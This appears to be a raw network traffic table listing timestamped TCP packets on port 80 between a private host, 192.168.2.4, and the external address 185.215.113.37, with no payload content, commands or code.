Sep 28, 2024 07:32:04.945786953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.945816994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.945827961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.945832968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.945852995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.945872068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.945991993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946007967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946017981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946027994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946043968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.946062088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.946086884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.946162939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946202993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.946213007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946253061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.946706057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946752071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.946768045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946779013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946808100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.946822882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.946932077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946943045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946952105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946963072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.946980000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.947007895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:04.947062969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:04.947101116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.072329998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072346926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072412014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.072508097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072613955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072627068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072642088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.072668076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072679996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072680950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.072715998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.072753906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072767019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072788954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.072814941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.072885036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072896004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.072947025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073118925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073129892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073160887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073160887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073173046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073184967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073198080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073221922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073328972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073369026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073374033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073385954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073414087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073429108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073494911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073504925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073514938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073524952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073544979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073565006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073715925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073726892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073761940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073817015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073827982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073890924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073921919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073959112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.073966980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.073977947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074006081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074125051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074135065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074145079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074155092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074166059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074182987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074207067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074346066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074357033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074387074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074407101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074529886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074557066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074565887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074573994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074589968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074606895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074708939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074719906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074729919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074749947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074775934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074826956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074856043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074865103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074889898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.074937105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074948072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074958086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074969053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.074980021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.075011015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.075164080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075175047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075210094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.075494051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075525999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075535059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075536013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.075562954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.075581074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.075676918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075686932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075695992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075706005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075721025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.075751066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.075936079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075948000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075957060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075967073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075978041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.075984955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.076013088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.076168060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.076179028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.076215029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.077291012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077327013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077332020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.077344894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077363968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.077382088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.077415943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077426910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077436924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077454090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.077476978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.077553034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077563047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077572107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077601910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.077619076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.077742100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077754021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077763081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077773094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077783108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077789068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.077794075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.077821016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.077838898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.078250885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.078259945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.078299999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.078334093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.078344107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.078353882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.078377008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.078392982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.078438044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.078448057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.078458071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.078474045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.078495026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.078706980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.078716993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.078758001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.159943104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.159956932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.159993887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.160021067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.160026073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.160114050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.160124063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.160288095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.160288095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.201973915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.201992989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202004910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202020884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202032089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202042103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202045918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202054024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202064991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202068090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202105999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202121973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202297926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202308893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202318907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202330112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202338934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202357054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202358961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202378988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202399969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202435017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202616930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202627897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202637911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202670097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202686071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202693939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202707052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202716112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202725887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202734947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202744961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.202747107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202779055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202794075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.202980995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203028917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.203142881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203176022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203186989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203197002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203207016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203216076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203217030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.203227043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203238010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203248024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203255892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.203258991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203272104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203291893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.203318119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.203676939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203687906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203696966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203706980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203716993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203726053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203727007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.203736067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203744888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203747034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.203758001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203769922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203773975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.203780890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.203794003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.203820944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.204230070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204241037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204251051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204260111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204271078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204279900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204281092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.204292059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204302073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204310894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204312086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.204322100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204332113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204336882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.204344034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204355001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204364061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204365015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.204375029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204385042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204386950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.204396009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204406023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.204406977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.204427958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.204452991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.205163956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205173969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205183029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205193043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205202103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205210924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205215931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.205220938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205234051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205239058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.205244064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205254078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205264091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205267906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.205275059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205281973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.205285072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205296993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205307961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205315113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.205318928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205331087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205341101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205347061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.205352068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205363035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205367088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.205391884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.205408096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.205933094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205944061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.205990076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.206087112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206098080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206106901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206116915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206126928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206136942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206139088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.206146955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206156015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.206157923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206168890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206180096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206182957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.206190109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206192017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.206199884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206211090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.206212997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.206222057 CEST	80	49730	185.215.113.37	192.168.2.4
